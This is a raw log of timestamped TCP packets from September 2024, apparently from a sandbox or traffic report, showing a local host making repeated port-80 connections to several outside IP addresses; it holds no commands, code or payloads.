                                                                Sep 22, 2024 17:41:25.070986032 CEST804972281.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:41:25.711596012 CEST804972281.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:41:25.765860081 CEST4972280192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:41:25.864376068 CEST804972281.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:41:25.864595890 CEST4972280192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:41:26.578397036 CEST4972280192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:41:27.597284079 CEST4972380192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:41:27.602535963 CEST804972381.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:41:27.602663994 CEST4972380192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:41:27.609587908 CEST4972380192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:41:27.614463091 CEST804972381.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:41:28.289849043 CEST804972381.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:41:28.290087938 CEST804972381.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:41:28.290155888 CEST4972380192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:41:28.292628050 CEST4972380192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:41:28.297756910 CEST804972381.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:41:33.418371916 CEST4972580192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:33.427057028 CEST804972585.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:33.429825068 CEST4972580192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:33.441397905 CEST4972580192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:33.446664095 CEST804972585.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:34.955717087 CEST4972580192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:34.966970921 CEST804972585.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:34.967053890 CEST4972580192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:35.971978903 CEST4972680192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:35.977056980 CEST804972685.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:35.977186918 CEST4972680192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:35.986820936 CEST4972680192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:35.991787910 CEST804972685.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:37.500849962 CEST4972680192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:37.516253948 CEST804972685.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:37.516341925 CEST4972680192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:38.519217014 CEST4972880192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:38.527056932 CEST804972885.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:38.527287960 CEST4972880192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:38.537328005 CEST4972880192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:38.542804003 CEST804972885.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:38.542980909 CEST804972885.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:40.047208071 CEST4972880192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:40.059578896 CEST804972885.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:40.059669018 CEST4972880192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:41.127441883 CEST4972980192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:41.132601976 CEST804972985.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:41.132735968 CEST4972980192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:41.252269030 CEST4972980192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:41.257275105 CEST804972985.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:41.844948053 CEST804972985.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:41.845019102 CEST804972985.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:41.845208883 CEST4972980192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:41.847832918 CEST4972980192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:41.852756023 CEST804972985.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:46.905200958 CEST4973080192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:46.912375927 CEST80497303.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:46.912527084 CEST4973080192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:47.003547907 CEST4973080192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:47.052047014 CEST80497303.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:47.437525034 CEST80497303.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:47.437706947 CEST4973080192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:48.516175032 CEST4973080192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:48.525729895 CEST80497303.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:49.536590099 CEST4973180192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:49.541584015 CEST80497313.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:49.541676998 CEST4973180192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:49.552201033 CEST4973180192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:49.557054996 CEST80497313.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:50.057920933 CEST80497313.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:50.058046103 CEST4973180192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:51.062975883 CEST4973180192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:51.067915916 CEST80497313.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:52.081391096 CEST4973280192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:52.522433996 CEST80497323.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:52.522636890 CEST4973280192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:52.532500982 CEST4973280192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:52.537482977 CEST80497323.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:52.537549019 CEST80497323.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:52.983364105 CEST80497323.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:52.983479977 CEST4973280192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:54.047188997 CEST4973280192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:54.052551985 CEST80497323.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:55.065958977 CEST4973380192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:55.071109056 CEST80497333.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:55.071293116 CEST4973380192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:55.078181028 CEST4973380192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:55.083019018 CEST80497333.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:55.528479099 CEST80497333.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:55.528537035 CEST80497333.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:55.528796911 CEST4973380192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:55.531353951 CEST4973380192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:55.536299944 CEST80497333.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:00.553106070 CEST4973580192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:00.560101032 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:00.560429096 CEST4973580192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:00.571456909 CEST4973580192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:00.576271057 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.169397116 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.169428110 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.169445992 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.169462919 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.169481993 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.169502974 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.169513941 CEST4973580192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:01.169517040 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.169533014 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.169548988 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.169567108 CEST4973580192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:01.169584990 CEST4973580192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:01.170106888 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.170914888 CEST4973580192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:01.174412012 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.174448013 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.174467087 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.174504995 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.174525023 CEST4973580192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:01.174559116 CEST4973580192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:02.078603983 CEST4973580192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.097784042 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.102776051 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.103051901 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.113465071 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.118524075 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697058916 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697113991 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697150946 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697180986 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.697186947 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697217941 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697251081 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697283983 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697315931 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697350979 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697365046 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.697365046 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.697365046 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.697387934 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697511911 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.702311993 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.702373981 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.702408075 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.702426910 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.702444077 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.702552080 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.702627897 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.702693939 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:04.634958029 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:05.644210100 CEST4973780192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:05.651356936 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:05.651428938 CEST4973780192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:05.663593054 CEST4973780192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:05.670502901 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:05.672744036 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.336571932 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.336606026 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.336620092 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.336694002 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.336707115 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.336719036 CEST4973780192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:06.336790085 CEST4973780192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:06.336806059 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.336817980 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.336843014 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.336864948 CEST4973780192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:06.336888075 CEST4973780192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:06.336913109 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.336922884 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.337013960 CEST4973780192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:06.341563940 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.341634989 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.341646910 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.341675997 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.341780901 CEST4973780192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:07.172415018 CEST4973780192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:08.192006111 CEST4973880192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:08.198446035 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.198513985 CEST4973880192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:08.207600117 CEST4973880192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:08.214399099 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814095974 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814115047 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814127922 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814208031 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814219952 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814232111 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814244986 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814383030 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814383030 CEST4973880192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:08.814395905 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814409018 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814461946 CEST4973880192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:08.814548969 CEST4973880192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:08.819174051 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.819236994 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.819248915 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.819982052 CEST4973880192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:08.822549105 CEST4973880192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:08.827368021 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:14.211810112 CEST4973980192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:14.216831923 CEST804973915.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:14.216911077 CEST4973980192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:14.229240894 CEST4973980192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:14.236447096 CEST804973915.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:14.672823906 CEST804973915.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:14.672981024 CEST4973980192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:15.735744953 CEST4973980192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:15.741745949 CEST804973915.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:16.779516935 CEST4974080192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:16.785655022 CEST804974015.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:16.788774967 CEST4974080192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:16.850892067 CEST4974080192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:16.855799913 CEST804974015.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:17.250310898 CEST804974015.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:17.250698090 CEST4974080192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:18.360618114 CEST4974080192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:18.365664005 CEST804974015.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:19.395262957 CEST4974180192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:19.400293112 CEST804974115.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:19.400382996 CEST4974180192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:19.437231064 CEST4974180192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:19.442166090 CEST804974115.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:19.442231894 CEST804974115.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:19.858378887 CEST804974115.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:19.858515024 CEST4974180192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:20.953532934 CEST4974180192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:20.958790064 CEST804974115.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:21.972455978 CEST4974280192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:21.977478981 CEST804974215.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:21.977580070 CEST4974280192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:21.986989021 CEST4974280192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:21.991903067 CEST804974215.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:22.448048115 CEST804974215.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:22.448100090 CEST804974215.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:22.449845076 CEST4974280192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:22.458657980 CEST4974280192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:22.463505983 CEST804974215.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:28.001913071 CEST4974480192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:28.007366896 CEST804974446.17.172.49192.168.2.6
                                                                Sep 22, 2024 17:42:28.007555962 CEST4974480192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:28.018125057 CEST4974480192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:28.022928953 CEST804974446.17.172.49192.168.2.6
                                                                Sep 22, 2024 17:42:29.533835888 CEST4974480192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:29.539150953 CEST804974446.17.172.49192.168.2.6
                                                                Sep 22, 2024 17:42:29.542058945 CEST4974480192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:30.561991930 CEST4974580192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:30.566821098 CEST804974546.17.172.49192.168.2.6
                                                                Sep 22, 2024 17:42:30.566895962 CEST4974580192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:30.580266953 CEST4974580192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:30.585297108 CEST804974546.17.172.49192.168.2.6
                                                                Sep 22, 2024 17:42:31.547988892 CEST804974546.17.172.49192.168.2.6
                                                                Sep 22, 2024 17:42:31.548017979 CEST804974546.17.172.49192.168.2.6
                                                                Sep 22, 2024 17:42:31.549664021 CEST4974580192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:31.549894094 CEST804974546.17.172.49192.168.2.6
                                                                Sep 22, 2024 17:42:31.550120115 CEST4974580192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:32.099822998 CEST4974580192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:33.113008976 CEST4974680192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:33.120688915 CEST804974646.17.172.49192.168.2.6
                                                                Sep 22, 2024 17:42:33.120758057 CEST4974680192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:33.132479906 CEST4974680192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:33.140813112 CEST804974646.17.172.49192.168.2.6
                                                                Sep 22, 2024 17:42:33.140824080 CEST804974646.17.172.49192.168.2.6
                                                                Sep 22, 2024 17:42:34.093350887 CEST804974646.17.172.49192.168.2.6
                                                                Sep 22, 2024 17:42:34.093435049 CEST804974646.17.172.49192.168.2.6
                                                                Sep 22, 2024 17:42:34.093502045 CEST4974680192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:34.093523979 CEST804974646.17.172.49192.168.2.6
                                                                Sep 22, 2024 17:42:34.094263077 CEST4974680192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:34.641050100 CEST4974680192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:35.659641981 CEST4974780192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:35.664498091 CEST804974746.17.172.49192.168.2.6
                                                                Sep 22, 2024 17:42:35.664571047 CEST4974780192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:35.671866894 CEST4974780192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:35.676665068 CEST804974746.17.172.49192.168.2.6
                                                                Sep 22, 2024 17:42:37.125828981 CEST804974746.17.172.49192.168.2.6
                                                                Sep 22, 2024 17:42:37.125852108 CEST804974746.17.172.49192.168.2.6
                                                                Sep 22, 2024 17:42:37.125864983 CEST804974746.17.172.49192.168.2.6
                                                                Sep 22, 2024 17:42:37.125874996 CEST804974746.17.172.49192.168.2.6
                                                                Sep 22, 2024 17:42:37.125992060 CEST4974780192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:37.128710985 CEST4974780192.168.2.646.17.172.49
                                                                Sep 22, 2024 17:42:37.135375977 CEST804974746.17.172.49192.168.2.6
                                                                Sep 22, 2024 17:42:42.171447039 CEST4974880192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:42.181104898 CEST80497483.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:42.181165934 CEST4974880192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:42.456343889 CEST4974880192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:42.464140892 CEST80497483.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:42.678519011 CEST80497483.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:42.678611994 CEST4974880192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:43.969158888 CEST4974880192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:43.977054119 CEST80497483.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:44.988307953 CEST4974980192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:44.993415117 CEST80497493.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:44.993503094 CEST4974980192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:45.005708933 CEST4974980192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:45.011058092 CEST80497493.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:46.515985966 CEST4974980192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:46.521121979 CEST80497493.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:46.521173954 CEST4974980192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:47.548151970 CEST4975080192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:47.553082943 CEST80497503.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:47.553204060 CEST4975080192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:47.565902948 CEST4975080192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:47.570976019 CEST80497503.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:47.570991993 CEST80497503.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:48.031414032 CEST80497503.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:48.031483889 CEST4975080192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:49.078629017 CEST4975080192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:49.083841085 CEST80497503.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:50.137245893 CEST4975180192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:50.162620068 CEST80497513.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:50.162734032 CEST4975180192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:50.198700905 CEST4975180192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:50.205342054 CEST80497513.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:50.664602041 CEST80497513.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:50.665944099 CEST80497513.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:50.666106939 CEST4975180192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:50.667460918 CEST4975180192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:50.672496080 CEST80497513.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:55.698268890 CEST4975280192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:55.704682112 CEST80497523.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:55.704763889 CEST4975280192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:55.715553999 CEST4975280192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:55.722410917 CEST80497523.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:56.199420929 CEST80497523.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:56.201908112 CEST4975280192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:57.219125986 CEST4975280192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:57.225039959 CEST80497523.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:58.238698959 CEST4975480192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:58.248462915 CEST80497543.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:58.248572111 CEST4975480192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:58.259905100 CEST4975480192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:58.268747091 CEST80497543.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:58.935667038 CEST80497543.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:58.937891960 CEST4975480192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:59.766124010 CEST4975480192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:42:59.773763895 CEST80497543.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:43:00.784625053 CEST4975580192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:43:00.806118011 CEST80497553.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:43:00.806219101 CEST4975580192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:43:00.816793919 CEST4975580192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:43:00.840341091 CEST80497553.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:43:00.843677998 CEST80497553.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:43:01.292418957 CEST80497553.33.130.190192.168.2.6
